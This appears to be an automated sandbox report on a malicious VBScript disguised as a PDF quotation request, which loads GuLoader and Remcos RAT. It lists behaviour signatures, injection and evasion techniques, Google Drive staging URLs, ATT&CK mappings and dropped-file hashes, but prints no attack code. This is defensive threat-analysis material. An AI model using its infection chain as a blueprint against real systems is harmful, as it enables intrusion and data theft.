              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000010.00000002.1859072664.000000000064C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7632, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-5VYA3JJump to behavior
              Source: Yara matchFile source: 00000010.00000002.1859072664.000000000064C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7632, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              311
              Process Injection
              11
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Remote Access Software
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)311
              Process Injection
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Remote System Discovery
              SSHKeylogging13
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634190 Sample: ANGEBOTSANFRAGE (Universit#... Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 32 drive.usercontent.google.com 2->32 34 drive.google.com 2->34 36 2 other IPs or domains 2->36 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected GuLoader 2->48 50 6 other signatures 2->50 8 wscript.exe 1 2->8         started        11 powershell.exe 15 2->11         started        13 svchost.exe 1 1 2->13         started        16 msiexec.exe 2->16         started        signatures3 process4 dnsIp5 56 VBScript performs obfuscated calls to suspicious functions 8->56 58 Suspicious powershell command line found 8->58 60 Wscript starts Powershell (via cmd or directly) 8->60 70 2 other signatures 8->70 18 powershell.exe 14 20 8->18         started        22 PING.EXE 1 8->22         started        62 Early bird code injection technique detected 11->62 64 Writes to foreign memory regions 11->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 11->66 68 Queues an APC in another process (thread injection) 11->68 24 msiexec.exe 6 11->24         started        26 conhost.exe 11->26         started        42 127.0.0.1 unknown unknown 13->42 signatures6 process7 dnsIp8 38 drive.usercontent.google.com 142.250.186.161, 443, 49687, 49697 GOOGLEUS United States 18->38 40 drive.google.com 142.250.186.174, 443, 49682, 49685 GOOGLEUS United States 18->40 52 Found suspicious powershell code related to unpacking or dynamic code loading 18->52 28 conhost.exe 18->28         started        30 conhost.exe 22->30         started        54 Detected Remcos RAT 24->54 signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs16%VirustotalBrowse
              ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs16%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.210.172
              truefalse
                high
                drive.google.com
                142.250.186.174
                truefalse
                  high
                  drive.usercontent.google.com
                  142.250.186.161
                  truefalse
                    high
                    Host_6637.6637.6637.657e
                    unknown
                    unknownfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/pscore6lBYqpowershell.exe, 0000000E.00000002.1655297069.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://drive.googpowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.microsoftpowershell.exe, 0000000E.00000002.1689306097.0000000007B44000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.google.com/uc?expowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.google.com/upowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.ver)svchost.exe, 00000006.00000002.2385015226.000001B674000000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.usercontent.google.com/msiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.0000000000680000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.microsoft.powershell.exe, 0000000E.00000002.1689306097.0000000007BAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.gopowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/Dmsiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://drive.goopowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.compowershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://drive.gpowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/ucpowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://g.live.com/odclientsettings/Prod-C:edb.log.6.drfalse
                                                                  high
                                                                  https://drive.google.com/powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://drive.googlpowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://drive.google.com/uc?epowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/powershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000006.00000003.1202986744.000001B673D90000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                                                                            high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://drive.google.compowershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://drive.usercontent.google.compowershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive.usercontent.google.com/ymsiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.0000000000680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive.google.cpowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000004.00000002.1344746282.0000022580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://apis.google.compowershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive.google.com/uc?powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1344746282.0000022580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1655297069.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://drive.googlepowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://drive.google.copowershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  142.250.186.161
                                                                                                  drive.usercontent.google.comUnited States
                                                                                                  15169GOOGLEUSfalse
                                                                                                  142.250.186.174
                                                                                                  drive.google.comUnited States
                                                                                                  15169GOOGLEUSfalse
                                                                                                  IP
                                                                                                  127.0.0.1
                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                  Analysis ID:1634190
                                                                                                  Start date and time:2025-03-10 20:36:29 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 7m 12s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:22
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:1
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs
                                                                                                  renamed because original name is a hash value
                                                                                                  Original Sample Name:ANGEBOTSANFRAGE (Universitt Klagenfurt) 10-03-2025pdf.vbs
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.expl.evad.winVBS@13/13@3/3
                                                                                                  EGA Information:Failed
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 74%
                                                                                                  • Number of executed functions: 40
                                                                                                  • Number of non-executed functions: 18
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .vbs
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, consent.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 72.247.153.178, 72.247.153.162, 23.199.214.10, 20.109.210.53, 4.175.87.197
                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, e16604.f.akamaiedge.net, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4504 because it is empty
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7356 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  TimeTypeDescription
                                                                                                  15:37:29API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                                  15:37:32API Interceptor150x Sleep call for process: powershell.exe modified
                                                                                                  15:37:38API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                  No context
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  bg.microsoft.map.fastly.netOnline Notification.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 199.232.210.172
                                                                                                  FW 188355..msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 199.232.214.172
                                                                                                  x3xqeKOaAd.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                  • 199.232.210.172
                                                                                                  PastePictures 1.xlaGet hashmaliciousUnknownBrowse
                                                                                                  • 199.232.214.172
                                                                                                  POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 199.232.210.172
                                                                                                  CO894GOV2O25.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 199.232.210.172
                                                                                                  DIR-A_JY4878249#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 199.232.214.172
                                                                                                  POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 199.232.210.172
                                                                                                  TNOR_CYCLE_C2_250000615284_32106010359796_E_BDA_0_E_20250310_192757#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 199.232.210.172
                                                                                                  cv(german-v).pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 199.232.214.172
                                                                                                  No context
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eq2e132qweertgd.exe.bin.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  lalaloopy.htaGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  SNKO05B241100201.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  SNKO05B241100201..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  SNKO05B241100201.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  Inst#U0430ll.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  sNtelKBdvr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  B599ZYjsg4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  LdksctiMff.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  37f463bf4616ecd445d4a1937da06e19rgk62zzDVd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  pgsAuwtaJ4.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  ESrG8c98zz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  ZS0Uo8zwGk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  LhMU00WNoQ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  LdksctiMff.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  UWCCivkQKO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  ResPencil.5.6.1.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  QUo9fr3nQW.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  Z4nC253E8n.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.186.161
                                                                                                  • 142.250.186.174
                                                                                                  No context
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1310720
                                                                                                  Entropy (8bit):0.8807573772472029
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9A:0J7adfWuK0p/QDfKoPeuP0aN4fqox3
                                                                                                  MD5:35A49040CA3C9592858EB02F4C688EBD
                                                                                                  SHA1:2F24566C3A93A6D15CC4760799EAECF32B5A5F50
                                                                                                  SHA-256:458F251259C3FEEF3389AAFAF2E84702B84E0FF0281CB57B078562DDA09ABFBA
                                                                                                  SHA-512:CD6E42FB744718C402B1A765E6F469CD6789066ACA0B1ADC58FACB318EE9411588B708A51FBA86D6333910776BDCF375FFDFFB6DE898A1FA6E84198CB3AE6535
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfa81d648, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1310720
                                                                                                  Entropy (8bit):0.7880606565619847
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:fSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:fazaPv4V4fXq2UaB
                                                                                                  MD5:9B62C62996592669D667F6CD924F1AAF
                                                                                                  SHA1:E0513EC811012BE2F63B257B5BB38E1DAA594F3E
                                                                                                  SHA-256:8C53A3E471BD08615B140B25FD5C548B43E49BE08766592ACE849328052CF68F
                                                                                                  SHA-512:43E77834A900A0460EF400D3E622CB670CF840611D28DC54367B5C380C1959AF15DF3E5D83975DD5B095DF1665DA9DEEFFF3817BBCB7D80E4501120E095A0C73
                                                                                                  Malicious:false
                                                                                                  Preview:...H... ...............X\...;...{......................X............{..&%...}?.h...........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......12...{...............................................................................................................................................................................................2...{....................................g\&%...}?...................f.&%...}?..........................#......h.......................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.08083927869179455
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YtKYe0jmR8iemXlVG0+q2Iqe8lUlv4llillNTt/4ll/Q6beV/:YKzP89UGE8lU14/GHtc6V
                                                                                                  MD5:5496027A51934F5843E525DA67867C0C
                                                                                                  SHA1:F88AFB37717CB0E0C5394E7815C77AB6A99DEE25
                                                                                                  SHA-256:EDBF1A95A2681D124A645797ABA9C919AE41AFCB3F966E8618AD012A9764BCB1
                                                                                                  SHA-512:889E0D6ED640CA6C0DAAEA66054CD86A87B65DB3D5F65C04F80C5166AF8103CAC1FCD3490A275C437235CF8863D0F6D08BBD262C0C56EE4ECBD2CFB542E5E404
                                                                                                  Malicious:false
                                                                                                  Preview:.h:......................................;...{..&%...}?......{...............{.......{....:......{...................f.&%...}?.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                  Category:dropped
                                                                                                  Size (bytes):73305
                                                                                                  Entropy (8bit):7.996028107841645
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                                                                                  MD5:83142242E97B8953C386F988AA694E4A
                                                                                                  SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                                                                  SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                                                                  SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                                                                  Malicious:false
                                                                                                  Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):330
                                                                                                  Entropy (8bit):3.189712167018517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:kKbsmcvSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:gmCkPlE99SNxAhUeq8S
